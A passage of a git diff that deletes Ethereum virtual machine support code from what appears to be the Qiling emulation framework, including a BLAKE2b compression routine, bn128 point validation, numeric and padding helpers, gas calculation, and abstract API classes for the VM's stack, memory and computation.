DISCLAIMS ALL - WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED - WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL - THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR - CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM - LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, - NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN - CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - - (the ISC license, a minor tweak of the BSD license) - -""" - - -class Blake2: - """ Blake2 is a base class for Blake2b and Blake2s """ - - # for more than 10 rounds, the schedule wraps around to the beginning - sigma_schedule = ( - (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15), - (14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3), - (11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4), - (7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8), - (9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13), - (2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9), - (12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11), - (13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10), - (6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5), - (10, 2, 8, 4, 7, 6, 1, 5, 15, 11, 9, 14, 3, 12, 13, 0), - ) - - -class Blake2b(Blake2): - - WORDBITS = 64 - MASKBITS = 2 ** WORDBITS - 1 - WORDFMT = 'Q' - - IV = ( - 0x6a09e667f3bcc908, 0xbb67ae8584caa73b, - 0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1, - 0x510e527fade682d1, 0x9b05688c2b3e6c1f, - 0x1f83d9abfb41bd6b, 0x5be0cd19137e2179 - ) - - ROT1 = 32 - ROT2 = 24 - ROT3 = 16 - ROT4 = 63 - - -TMessageBlock = Tuple[int, int, int, int, int, int, int, int] - - -def blake2b_compress( - num_rounds: int, - h_starting_state: TMessageBlock, - block: bytes, - t_offset_counters: Tuple[int, int], - final_block_flag: bool) -> bytes: - """ - 'F Compression' from section 3.2 of RFC 7693: - https://tools.ietf.org/html/rfc7693#section-3.2 - """ - - # Dereference these for [very small] speed improvement. - # Perhaps more than anything, this makes the code - # easier to read. - MASKBITS = Blake2b.MASKBITS - WORDBITS = Blake2b.WORDBITS - IV = Blake2b.IV - ROT1 = Blake2b.ROT1 - ROT2 = Blake2b.ROT2 - ROT3 = Blake2b.ROT3 - ROT4 = Blake2b.ROT4 - WB_ROT1 = WORDBITS - ROT1 - WB_ROT2 = WORDBITS - ROT2 - WB_ROT3 = WORDBITS - ROT3 - WB_ROT4 = WORDBITS - ROT4 - - sigma_schedule = Blake2b.sigma_schedule - sigma_schedule_len = len(sigma_schedule) - - # convert block (bytes) into 16 LE words - m = struct.unpack_from('<16%s' % Blake2b.WORDFMT, bytes(block)) - - v = [0] * 16 - v[0: 8] = h_starting_state - v[8:12] = IV[:4] - v[12] = t_offset_counters[0] ^ IV[4] - v[13] = t_offset_counters[1] ^ IV[5] - - if final_block_flag: - v[14] = Blake2b.MASKBITS ^ IV[6] - else: - v[14] = IV[6] - - # The original code had a mechanism to turn on a "tree mode", - # setting f[1] to MASKBITS here. - # There seems to be no reference to that bit flip in the 3.2 section of RFC 7693, - # and there is no such setting in EIP-152. So the bit flip option is removed. - v[15] = IV[7] - - # Within the confines of the Python language, this is a - # highly optimized version of G(). It differs some from - # the formal specification and reference implementation. - def G(a: int, b: int, c: int, d: int) -> None: - # dereference v[] for another small speed improvement - va = v[a] - vb = v[b] - vc = v[c] - vd = v[d] - va = (va + vb + msri2) & MASKBITS - w = vd ^ va - vd = (w >> ROT1) | (w << (WB_ROT1)) & MASKBITS - vc = (vc + vd) & MASKBITS - w = vb ^ vc - vb = (w >> ROT2) | (w << (WB_ROT2)) & MASKBITS - va = (va + vb + msri21) & MASKBITS - w = vd ^ va - vd = (w >> ROT3) | (w << (WB_ROT3)) & MASKBITS - vc = (vc + vd) & MASKBITS - w = vb ^ vc - vb = (w >> ROT4) | (w << (WB_ROT4)) & MASKBITS - # re-reference v[] - v[a] = va - v[b] = vb - v[c] = vc - v[d] = vd - - # time to ChaCha - for r in range(num_rounds): - # resolve as much as possible outside G() and - # don't pass as argument, let scope do its job. - # Result is a 50% speed increase, but sadly, - # "slow" divided by 1.5 is still "slow". :-/ - sr = sigma_schedule[r % sigma_schedule_len] - msri2 = m[sr[0]] - msri21 = m[sr[1]] - G(0, 4, 8, 12) - msri2 = m[sr[2]] - msri21 = m[sr[3]] - G(1, 5, 9, 13) - msri2 = m[sr[4]] - msri21 = m[sr[5]] - G(2, 6, 10, 14) - msri2 = m[sr[6]] - msri21 = m[sr[7]] - G(3, 7, 11, 15) - msri2 = m[sr[8]] - msri21 = m[sr[9]] - G(0, 5, 10, 15) - msri2 = m[sr[10]] - msri21 = m[sr[11]] - G(1, 6, 11, 12) - msri2 = m[sr[12]] - msri21 = m[sr[13]] - G(2, 7, 8, 13) - msri2 = m[sr[14]] - msri21 = m[sr[15]] - G(3, 4, 9, 14) - - result_message_words = (h_starting_state[i] ^ v[i] ^ v[i + 8] for i in range(8)) - return struct.pack(f'<8{Blake2b.WORDFMT}', *result_message_words) diff --git a/qiling/arch/evm/_utils/bn128.py b/qiling/arch/evm/_utils/bn128.py deleted file mode 100644 index 4f85c7503..000000000 --- a/qiling/arch/evm/_utils/bn128.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from py_ecc import ( - optimized_bn128 as bn128, -) -from py_ecc.optimized_bn128 import ( - FQP, - FQ2, -) - -from eth_utils import ( - ValidationError, -) - -from typing import Tuple - - -def validate_point(x: int, y: int) -> Tuple[bn128.FQ, bn128.FQ, bn128.FQ]: - FQ = bn128.FQ - - if x >= bn128.field_modulus: - raise ValidationError("Point x value is greater than field modulus") - elif y >= bn128.field_modulus: - raise ValidationError("Point y value is greater than field modulus") - - if (x, y) != (0, 0): - p1 = (FQ(x), FQ(y), FQ(1)) - if not bn128.is_on_curve(p1, bn128.b): - raise ValidationError("Point is not on the curve") - else: - p1 = (FQ(1), FQ(1), FQ(0)) - - return p1 - - -def FQP_point_to_FQ2_point(pt: Tuple[FQP, FQP, FQP]) -> Tuple[FQ2, FQ2, FQ2]: - """ - Transform FQP to FQ2 for type hinting. - """ - return ( - FQ2(pt[0].coeffs), - FQ2(pt[1].coeffs), - FQ2(pt[2].coeffs), - ) diff --git a/qiling/arch/evm/_utils/datatypes.py b/qiling/arch/evm/_utils/datatypes.py deleted file mode 100644 index 7716083db..000000000 --- a/qiling/arch/evm/_utils/datatypes.py +++ /dev/null @@ -1,127 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_utils.toolz import ( - assoc, - groupby, -) - -from eth_utils import ( - to_dict, - to_set, -) - - -from typing import Any, Dict, Tuple, Type, TypeVar, Iterator, List - -from ..abc import ConfigurableAPI - - -def _is_local_prop(prop: str) -> bool: - return len(prop.split('.')) == 1 - - -def _extract_top_level_key(prop: str) -> str: - left, _, _ = prop.partition('.') - return left - - -def _extract_tail_key(prop: str) -> str: - _, _, right = prop.partition('.') - return right - - -@to_dict -def _get_local_overrides(overrides: Dict[str, Any]) -> Iterator[Tuple[str, Any]]: - for prop, value in overrides.items(): - if _is_local_prop(prop): - yield prop, value - - -@to_dict -def _get_sub_overrides(overrides: Dict[str, Any]) -> Iterator[Tuple[str, Any]]: - for prop, value in overrides.items(): - if not _is_local_prop(prop): - yield prop, value - - -@to_dict -def _get_sub_overrides_by_prop( - overrides: Dict[str, Any]) -> Iterator[Tuple[str, Dict[str, List[str]]]]: - # we only want the overrides that are not top level. - sub_overrides = _get_sub_overrides(overrides) - key_groups = groupby(_extract_top_level_key, sub_overrides.keys()) - for top_level_key, props in key_groups.items(): - yield top_level_key, {_extract_tail_key(prop): overrides[prop] for prop in props} - - -@to_set -def _get_top_level_keys(overrides: Dict[str, Any]) -> Iterator[str]: - for prop in overrides: - yield _extract_top_level_key(prop) - -# Dynamic subclassing is not supported by mypy -# https://github.com/python/mypy/wiki/Unsupported-Python-Features -# Most of the cases where we silence mypy boil down to cases where -# dynamic subclasses where generated through this method - - -T = TypeVar('T') - - -class Configurable(ConfigurableAPI): - """ - Base class for simple inline subclassing - """ - @classmethod - def configure(cls: Type[T], - __name__: str = None, - **overrides: Any) -> Type[T]: - - if __name__ is None: - __name__ = cls.__name__ - - top_level_keys = _get_top_level_keys(overrides) - - # overrides that are *local* to this class. - local_overrides = _get_local_overrides(overrides) - - for key in top_level_keys: - if key == '__name__': - continue - elif not hasattr(cls, key): - raise TypeError( - f"The {cls.__name__}.configure cannot set attributes that are not " - f"already present on the base class. The attribute `{key}` was " - f"not found on the base class `{cls}`" - ) - - # overrides that are for sub-properties of this class - sub_overrides_by_prop = _get_sub_overrides_by_prop(overrides) - - for key, sub_overrides in sub_overrides_by_prop.items(): - sub_cls: Configurable = None - if key in local_overrides: - sub_cls = local_overrides[key] - elif hasattr(cls, key): - sub_cls = getattr(cls, key) - else: - raise Exception( - "Invariant: the pre-check that all top level keys are " - "present on `cls` should make this code path unreachable" - ) - - if not isinstance(sub_cls, type) or not issubclass(sub_cls, Configurable): - raise TypeError( - f"Unable to configure property `{key}` on class `{cls!r}`. The " - "property being configured must be a subclass of the " - "`Configurable` type. Instead got the following object " - f"instance: {sub_cls!r}" - ) - - configured_sub_cls = sub_cls.configure(**sub_overrides) # type: ignore - local_overrides = assoc(local_overrides, key, configured_sub_cls) - - return type(__name__, (cls,), local_overrides) diff --git a/qiling/arch/evm/_utils/generator.py b/qiling/arch/evm/_utils/generator.py deleted file mode 100644 index e61d23a47..000000000 --- a/qiling/arch/evm/_utils/generator.py +++ /dev/null @@ -1,30 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import itertools -from typing import ( - Generic, - Iterable, - Iterator, - List, - TypeVar, -) - - -TItem = TypeVar('TItem') - - -class CachedIterable(Generic[TItem], Iterable[TItem]): - def __init__(self, iterable: Iterable[TItem]) -> None: - self._cached_results: List[TItem] = [] - self._iterator = iter(iterable) - - def __iter__(self) -> Iterator[TItem]: - return itertools.chain(self._cached_results, self._cache_and_yield()) - - def _cache_and_yield(self) -> Iterator[TItem]: - for item in self._iterator: - self._cached_results.append(item) - yield item diff --git a/qiling/arch/evm/_utils/numeric.py b/qiling/arch/evm/_utils/numeric.py deleted file mode 100644 index 7d40555ef..000000000 --- a/qiling/arch/evm/_utils/numeric.py +++ /dev/null @@ -1,123 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import decimal -import functools -import itertools -from typing import ( - Union, -) - -from eth_utils.toolz import ( - curry, -) -from eth_typing import ( - Hash32, -) - -from ..constants import ( - UINT_255_MAX, - UINT_256_MAX, - UINT_256_CEILING, -) - - -def int_to_bytes32(value: Union[int, bool]) -> Hash32: - if not isinstance(value, int) or isinstance(value, bool): - raise ValueError( - f"Value must be an integer: Got: {type(value)}" - ) - if value < 0: - raise ValueError( - f"Value cannot be negative: Got: {value}" - ) - if value > UINT_256_MAX: - raise ValueError( - f"Value exeeds maximum UINT256 size. Got: {value}" - ) - value_bytes = value.to_bytes(32, 'big') - return Hash32(value_bytes) - - -def ceilXX(value: int, ceiling: int) -> int: - remainder = value % ceiling - if remainder == 0: - return value - else: - return value + ceiling - remainder - - -ceil32 = functools.partial(ceilXX, ceiling=32) -ceil8 = functools.partial(ceilXX, ceiling=8) - - -def unsigned_to_signed(value: int) -> int: - if value <= UINT_255_MAX: - return value - else: - return value - UINT_256_CEILING - - -def signed_to_unsigned(value: int) -> int: - if value < 0: - return value + UINT_256_CEILING - else: - return value - - -def is_even(value: int) -> bool: - return value % 2 == 0 - - -def is_odd(value: int) -> bool: - return value % 2 == 1 - - -def get_highest_bit_index(value: int) -> int: - value >>= 1 - for bit_length in itertools.count(): - if not value: - return bit_length - value >>= 1 - - raise Exception("Invariant: unreachable code path") - - -@curry -def clamp(inclusive_lower_bound: int, - inclusive_upper_bound: int, - value: int) -> int: - """ - Bound the given ``value`` between ``inclusive_lower_bound`` and - ``inclusive_upper_bound``. - """ - if value <= inclusive_lower_bound: - return inclusive_lower_bound - elif value >= inclusive_upper_bound: - return inclusive_upper_bound - else: - return value - - -def integer_squareroot(value: int) -> int: - """ - Return the integer square root of ``value``. - - Uses Python's decimal module to compute the square root of ``value`` with - a precision of 128-bits. The value 128 is chosen since the largest square - root of a 256-bit integer is a 128-bit integer. - """ - if not isinstance(value, int) or isinstance(value, bool): - raise ValueError( - f"Value must be an integer: Got: {type(value)}" - ) - if value < 0: - raise ValueError( - f"Value cannot be negative: Got: {value}" - ) - - with decimal.localcontext() as ctx: - ctx.prec = 128 - return int(decimal.Decimal(value).sqrt()) diff --git a/qiling/arch/evm/_utils/padding.py b/qiling/arch/evm/_utils/padding.py deleted file mode 100644 index 92738da98..000000000 --- a/qiling/arch/evm/_utils/padding.py +++ /dev/null @@ -1,25 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_utils.toolz import ( - curry, -) - - -ZERO_BYTE = b'\x00' - - -@curry -def zpad_right(value: bytes, to_size: int) -> bytes: - return value.ljust(to_size, ZERO_BYTE) - - -@curry -def zpad_left(value: bytes, to_size: int) -> bytes: - return value.rjust(to_size, ZERO_BYTE) - - -pad32 = zpad_left(to_size=32) -pad32r = zpad_right(to_size=32) diff --git a/qiling/arch/evm/_utils/transactions.py b/qiling/arch/evm/_utils/transactions.py deleted file mode 100644 index 18d27f42b..000000000 --- a/qiling/arch/evm/_utils/transactions.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from typing import NamedTuple -from ..constants import CREATE_CONTRACT_ADDRESS - - -class IntrinsicGasSchedule(NamedTuple): - gas_tx: int - gas_txcreate: int - gas_txdatazero: int - gas_txdatanonzero: int - - -def calculate_intrinsic_gas(msg_data:bytes, msg_to, gas_schedule:IntrinsicGasSchedule) -> int: - num_zero_bytes = msg_data.count(b'\x00') - num_non_zero_bytes = len(msg_data) - num_zero_bytes - if msg_to == CREATE_CONTRACT_ADDRESS: - create_cost = gas_schedule.gas_txcreate - else: - create_cost = 0 - return ( - gas_schedule.gas_tx - + num_zero_bytes * gas_schedule.gas_txdatazero - + num_non_zero_bytes * gas_schedule.gas_txdatanonzero - + create_cost - ) \ No newline at end of file diff --git a/qiling/arch/evm/abc.py b/qiling/arch/evm/abc.py deleted file mode 100644 index d69cd486a..000000000 --- a/qiling/arch/evm/abc.py +++ /dev/null @@ -1,1735 +0,0 @@ -from abc import ( - ABC, - abstractmethod -) -from typing import ( - Any, - Callable, - ContextManager, - Dict, - FrozenSet, - Iterable, - Iterator, - MutableMapping, - Tuple, - Type, - TypeVar, - Union, -) - -from eth_typing import ( - Address, - BlockNumber, - Hash32, -) - -from eth_utils import ExtendedDebugLogger - -from .constants import BLANK_ROOT_HASH - -from .exceptions import VMError -from .typing import ( - BytesOrView, - JournalDBCheckpoint, -) - - -T = TypeVar('T') - - -class MetaWitnessAPI(ABC): - @property - @abstractmethod - def hashes(self) -> FrozenSet[Hash32]: - ... - - @property - @abstractmethod - def accounts_queried(self) -> FrozenSet[Address]: - ... - - @property - @abstractmethod - def account_bytecodes_queried(self) -> FrozenSet[Address]: - ... - - @abstractmethod - def get_slots_queried(self, address: Address) -> FrozenSet[int]: - ... - - @property - @abstractmethod - def total_slots_queried(self) -> int: - """ - Summed across all accounts, how many storage slots were queried? - """ - ... - - -class DatabaseAPI(MutableMapping[bytes, bytes], ABC): - """ - A class representing a database. - """ - @abstractmethod - def set(self, key: bytes, value: bytes) -> None: - """ - Assign the ``value`` to the ``key``. - """ - ... - - @abstractmethod - def exists(self, key: bytes) -> bool: - """ - Return ``True`` if the ``key`` exists in the database, otherwise ``False``. - """ - ... - - @abstractmethod - def delete(self, key: bytes) -> None: - """ - Delete the given ``key`` from the database. - """ - ... - - -class AtomicWriteBatchAPI(DatabaseAPI): - """ - The readable/writeable object returned by an atomic database when we start building - a batch of writes to commit. - - Reads to this database will observe writes written during batching, - but the writes will not actually persist until this object is committed. - """ - pass - - -class AtomicDatabaseAPI(DatabaseAPI): - """ - Like ``BatchDB``, but immediately write out changes if they are - not in an ``atomic_batch()`` context. - """ - @abstractmethod - def atomic_batch(self) -> ContextManager[AtomicWriteBatchAPI]: - """ - Return a :class:`~typing.ContextManager` to write an atomic batch to the database. - """ - ... - - -class GasMeterAPI(ABC): - """ - A class to define a gas meter. - """ - gas_refunded: int - gas_remaining: int - - # - # Write API - # - @abstractmethod - def consume_gas(self, amount: int, reason: str) -> None: - """ - Consume ``amount`` of gas for a defined ``reason``. - """ - ... - - @abstractmethod - def return_gas(self, amount: int) -> None: - """ - Return ``amount`` of gas. - """ - ... - - @abstractmethod - def refund_gas(self, amount: int) -> None: - """ - Refund ``amount`` of gas. - """ - ... - - -class MessageAPI(ABC): - """ - A message for VM computation. - """ - code: bytes - _code_address: Address - create_address: Address - data: BytesOrView - depth: int - gas: int - is_static: bool - sender: Address - should_transfer_value: bool - _storage_address: Address - to: Address - value: int - gas_price: int - - __slots__ = [ - 'code', - '_code_address', - 'create_address', - 'data', - 'depth', - 'gas', - 'is_static', - 'sender', - 'should_transfer_value', - '_storage_address' - 'to', - 'value', - ] - - @property - @abstractmethod - def code_address(self) -> Address: - ... - - @property - @abstractmethod - def storage_address(self) -> Address: - ... - - @property - @abstractmethod - def is_create(self) -> bool: - ... - - @property - @abstractmethod - def data_as_bytes(self) -> bytes: - ... - - -class OpcodeAPI(ABC): - """ - A class representing an opcode. - """ - mnemonic: str - - @abstractmethod - def __call__(self, computation: 'ComputationAPI') -> None: - """ - Execute the logic of the opcode. - """ - ... - - @classmethod - @abstractmethod - def as_opcode(cls: Type[T], - logic_fn: Callable[['ComputationAPI'], None], - mnemonic: str, - gas_cost: int) -> T: - """ - Class factory method for turning vanilla functions into Opcodes. - """ - ... - - @abstractmethod - def __copy__(self) -> 'OpcodeAPI': - """ - Return a copy of the opcode. - """ - ... - - @abstractmethod - def __deepcopy__(self, memo: Any) -> 'OpcodeAPI': - """ - Return a deep copy of the opcode. - """ - ... - - -class TransactionContextAPI(ABC): - """ - Immutable transaction context information that remains constant over the VM execution. - """ - @abstractmethod - def __init__(self, gas_price: int, origin: Address) -> None: - """ - Initialize the transaction context from the given ``gas_price`` and ``origin`` address. - """ - ... - - @abstractmethod - def get_next_log_counter(self) -> int: - """ - Increment and return the log counter. - """ - ... - - @property - @abstractmethod - def gas_price(self) -> int: - """ - Return the gas price of the transaction context. - """ - ... - - @property - @abstractmethod - def origin(self) -> Address: - """ - Return the origin of the transaction context. - """ - ... - - -class MemoryAPI(ABC): - """ - A class representing the memory of the :class:`~eth.abc.VirtualMachineAPI`. - """ - @abstractmethod - def extend(self, start_position: int, size: int) -> None: - """ - Extend the memory from the given ``start_position`` to the provided ``size``. - """ - ... - - @abstractmethod - def __len__(self) -> int: - """ - Return the length of the memory. - """ - ... - - @abstractmethod - def write(self, start_position: int, size: int, value: bytes) -> None: - """ - Write `value` into memory. - """ - ... - - @abstractmethod - def read(self, start_position: int, size: int) -> memoryview: - """ - Return a view into the memory - """ - ... - - @abstractmethod - def read_bytes(self, start_position: int, size: int) -> bytes: - """ - Read a value from memory and return a fresh bytes instance - """ - ... - - -class StackAPI(ABC): - """ - A class representing the stack of the :class:`~eth.abc.VirtualMachineAPI`. - """ - @abstractmethod - def push_int(self, value: int) -> None: - """ - Push an integer item onto the stack. - """ - ... - - @abstractmethod - def push_bytes(self, value: bytes) -> None: - """ - Push a bytes item onto the stack. - """ - ... - - @abstractmethod - def pop1_bytes(self) -> bytes: - """ - Pop and return a bytes element from the stack. - - Raise `eth.exceptions.InsufficientStack` if the stack was empty. - """ - ... - - @abstractmethod - def pop1_int(self) -> int: - """ - Pop and return an integer from the stack. - - Raise `eth.exceptions.InsufficientStack` if the stack was empty. - """ - ... - - @abstractmethod - def pop1_any(self) -> Union[int, bytes]: - """ - Pop and return an element from the stack. - The type of each element will be int or bytes, depending on whether it was - pushed with push_bytes or push_int. - - Raise `eth.exceptions.InsufficientStack` if the stack was empty. - """ - ... - - @abstractmethod - def pop_any(self, num_items: int) -> Tuple[Union[int, bytes], ...]: - """ - Pop and return a tuple of items of length ``num_items`` from the stack. - The type of each element will be int or bytes, depending on whether it was - pushed with stack_push_bytes or stack_push_int. - - Raise `eth.exceptions.InsufficientStack` if there are not enough items on - the stack. - - Items are ordered with the top of the stack as the first item in the tuple. - """ - ... - - @abstractmethod - def pop_ints(self, num_items: int) -> Tuple[int, ...]: - """ - Pop and return a tuple of integers of length ``num_items`` from the stack. - - Raise `eth.exceptions.InsufficientStack` if there are not enough items on - the stack. - - Items are ordered with the top of the stack as the first item in the tuple. - """ - ... - - @abstractmethod - def pop_bytes(self, num_items: int) -> Tuple[bytes, ...]: - """ - Pop and return a tuple of bytes of length ``num_items`` from the stack. - - Raise `eth.exceptions.InsufficientStack` if there are not enough items on - the stack. - - Items are ordered with the top of the stack as the first item in the tuple. - """ - ... - - @abstractmethod - def swap(self, position: int) -> None: - """ - Perform a SWAP operation on the stack. - """ - ... - - @abstractmethod - def dup(self, position: int) -> None: - """ - Perform a DUP operation on the stack. - """ - ... - - -class CodeStreamAPI(ABC): - """ - A class representing a stream of EVM code. - """ - program_counter: int - - @abstractmethod - def read(self, size: int) -> bytes: - """ - Read and return the code from the current position of the cursor up to ``size``. - """ - ... - - @abstractmethod - def pc(self) -> int: - ... - - @abstractmethod - def __len__(self) -> int: - """ - Return the length of the code stream. - """ - ... - - @abstractmethod - def __getitem__(self, index: int) -> int: - """ - Return the ordinal value of the byte at the given ``index``. - """ - ... - - @abstractmethod - def __iter__(self) -> Iterator[int]: - """ - Iterate over all ordinal values of the bytes of the code stream. - """ - ... - - @abstractmethod - def peek(self) -> int: - """ - Return the ordinal value of the byte at the current program counter. - """ - ... - - @abstractmethod - def seek(self, program_counter: int) -> ContextManager['CodeStreamAPI']: - """ - Return a :class:`~typing.ContextManager` with the program counter - set to ``program_counter``. - """ - ... - - @abstractmethod - def is_valid_opcode(self, position: int) -> bool: - """ - Return ``True`` if a valid opcode exists at ``position``. - """ - ... - - -class StackManipulationAPI(ABC): - @abstractmethod - def stack_pop_ints(self, num_items: int) -> Tuple[int, ...]: - """ - Pop the last ``num_items`` from the stack, returning a tuple of their ordinal values. - """ - ... - - @abstractmethod - def stack_pop_bytes(self, num_items: int) -> Tuple[bytes, ...]: - """ - Pop the last ``num_items`` from the stack, returning a tuple of bytes. - """ - ... - - @abstractmethod - def stack_pop_any(self, num_items: int) -> Tuple[Union[int, bytes], ...]: - """ - Pop the last ``num_items`` from the stack, returning a tuple with potentially mixed values - of bytes or ordinal values of bytes. - """ - ... - - @abstractmethod - def stack_pop1_int(self) -> int: - """ - Pop one item from the stack and return the ordinal value of the represented bytes. - """ - ... - - @abstractmethod - def stack_pop1_bytes(self) -> bytes: - """ - Pop one item from the stack and return the value as ``bytes``. - """ - ... - - @abstractmethod - def stack_pop1_any(self) -> Union[int, bytes]: - """ - Pop one item from the stack and return the value either as byte or the ordinal value of - a byte. - """ - ... - - @abstractmethod - def stack_push_int(self, value: int) -> None: - """ - Push ``value`` on the stack which must be a 256 bit integer. - """ - ... - - @abstractmethod - def stack_push_bytes(self, value: bytes) -> None: - """ - Push ``value`` on the stack which must be a 32 byte string. - """ - ... - - -class ExecutionContextAPI(ABC): - """ - A class representing context information that remains constant over the execution of a block. - """ - @property - @abstractmethod - def coinbase(self) -> Address: - """ - Return the coinbase address of the block. - """ - ... - - @property - @abstractmethod - def timestamp(self) -> int: - """ - Return the timestamp of the block. - """ - ... - - @property - @abstractmethod - def block_number(self) -> BlockNumber: - """ - Return the number of the block. - """ - ... - - @property - @abstractmethod - def difficulty(self) -> int: - """ - Return the difficulty of the block. - """ - ... - - @property - @abstractmethod - def gas_limit(self) -> int: - """ - Return the gas limit of the block. - """ - ... - - @property - @abstractmethod - def prev_hashes(self) -> Iterable[Hash32]: - """ - Return an iterable of block hashes that precede the block. - """ - ... - - @property - @abstractmethod - def chain_id(self) -> int: - """ - Return the id of the chain. - """ - ... - - -class ComputationAPI(ContextManager['ComputationAPI'], StackManipulationAPI): - """ - The base class for all execution computations. - """ - msg: MessageAPI - logger: ExtendedDebugLogger - code: CodeStreamAPI - opcodes: Dict[int, OpcodeAPI] = None - state: 'StateAPI' - return_data: bytes - - @abstractmethod - def __init__(self, - state: 'StateAPI', - message: MessageAPI, - transaction_context: TransactionContextAPI) -> None: - """ - Instantiate the computation. - """ - ... - - # - # Convenience - # - @property - @abstractmethod - def is_origin_computation(self) -> bool: - """ - Return ``True`` if this computation is the outermost computation at ``depth == 0``. - """ - ... - - # - # Error handling - # - @property - @abstractmethod - def is_success(self) -> bool: - """ - Return ``True`` if the computation did not result in an error. - """ - ... - - @property - @abstractmethod - def is_error(self) -> bool: - """ - Return ``True`` if the computation resulted in an error. - """ - ... - - @property - @abstractmethod - def error(self) -> VMError: - """ - Return the :class:`~eth.exceptions.VMError` of the computation. - Raise ``AttributeError`` if no error exists. - """ - ... - - @error.setter - def error(self, value: VMError) -> None: - """ - Set an :class:`~eth.exceptions.VMError` for the computation. - """ - # See: https://github.com/python/mypy/issues/4165 - # Since we can't also decorate this with abstract method we want to be - # sure that the setter doesn't actually get used as a noop. - raise NotImplementedError - - @abstractmethod - def raise_if_error(self) -> None: - """ - If there was an error during computation, raise it as an exception immediately. - - :raise VMError: - """ - ... - - @property - @abstractmethod - def should_burn_gas(self) -> bool: - """ - Return ``True`` if the remaining gas should be burned. - """ - ... - - @property - @abstractmethod - def should_return_gas(self) -> bool: - """ - Return ``True`` if the remaining gas should be returned. - """ - ... - - @property - @abstractmethod - def should_erase_return_data(self) -> bool: - """ - Return ``True`` if the return data should be zerod out due to an error. - """ - ... - - # - # Memory Management - # - @abstractmethod - def extend_memory(self, start_position: int, size: int) -> None: - """ - Extend the size of the memory to be at minimum ``start_position + size`` - bytes in length. Raise `eth.exceptions.OutOfGas` if there is not enough - gas to pay for extending the memory. - """ - ... - - @abstractmethod - def memory_write(self, start_position: int, size: int, value: bytes) -> None: - """ - Write ``value`` to memory at ``start_position``. Require that ``len(value) == size``. - """ - ... - - @abstractmethod - def memory_read(self, start_position: int, size: int) -> memoryview: - """ - Read and return a view of ``size`` bytes from memory starting at ``start_position``. - """ - ... - - @abstractmethod - def memory_read_bytes(self, start_position: int, size: int) -> bytes: - """ - Read and return ``size`` bytes from memory starting at ``start_position``. - """ - ... - - # - # Gas Consumption - # - @abstractmethod - def get_gas_meter(self) -> GasMeterAPI: - """ - Return the :class:`~eth.abc.GasMeterAPI` of the computation. - """ - ... - - @abstractmethod - def consume_gas(self, amount: int, reason: str) -> None: - """ - Consume ``amount`` of gas from the remaining gas. - Raise `eth.exceptions.OutOfGas` if there is not enough gas remaining. - """ - ... - - @abstractmethod - def return_gas(self, amount: int) -> None: - """ - Return ``amount`` of gas to the available gas pool. - """ - ... - - @abstractmethod - def refund_gas(self, amount: int) -> None: - """ - Add ``amount`` of gas to the pool of gas marked to be refunded. - """ - ... - - @abstractmethod - def get_gas_refund(self) -> int: - """ - Return the number of refunded gas. - """ - ... - - @abstractmethod - def get_gas_used(self) -> int: - """ - Return the number of used gas. - """ - ... - - @abstractmethod - def get_gas_remaining(self) -> int: - """ - Return the number of remaining gas. - """ - ... - - # - # Stack management - # - @abstractmethod - def stack_swap(self, position: int) -> None: - """ - Swap the item on the top of the stack with the item at ``position``. - """ - ... - - @abstractmethod - def stack_dup(self, position: int) -> None: - """ - Duplicate the stack item at ``position`` and pushes it onto the stack. - """ - ... - - # - # Computation result - # - @property - @abstractmethod - def output(self) -> bytes: - """ - Get the return value of the computation. - """ - ... - - @output.setter - def output(self, value: bytes) -> None: - """ - Set the return value of the computation. - """ - # See: https://github.com/python/mypy/issues/4165 - # Since we can't also decorate this with abstract method we want to be - # sure that the setter doesn't actually get used as a noop. - raise NotImplementedError - - # - # Runtime operations - # - @abstractmethod - def prepare_child_message(self, - gas: int, - to: Address, - value: int, - data: BytesOrView, - code: bytes, - **kwargs: Any) -> MessageAPI: - """ - Helper method for creating a child computation. - """ - ... - - @abstractmethod - def apply_child_computation(self, child_msg: MessageAPI) -> 'ComputationAPI': - """ - Apply the vm message ``child_msg`` as a child computation. - """ - ... - - @abstractmethod - def generate_child_computation(self, child_msg: MessageAPI) -> 'ComputationAPI': - """ - Generate a child computation from the given ``child_msg``. - """ - ... - - @abstractmethod - def add_child_computation(self, child_computation: 'ComputationAPI') -> None: - """ - Add the given ``child_computation``. - """ - ... - - # - # Account management - # - @abstractmethod - def register_account_for_deletion(self, beneficiary: Address) -> None: - """ - Register the address of ``beneficiary`` for deletion. - """ - ... - - @abstractmethod - def get_accounts_for_deletion(self) -> Tuple[Tuple[Address, Address], ...]: - """ - Return a tuple of addresses that are registered for deletion. - """ - ... - - # - # EVM logging - # - @abstractmethod - def add_log_entry(self, account: 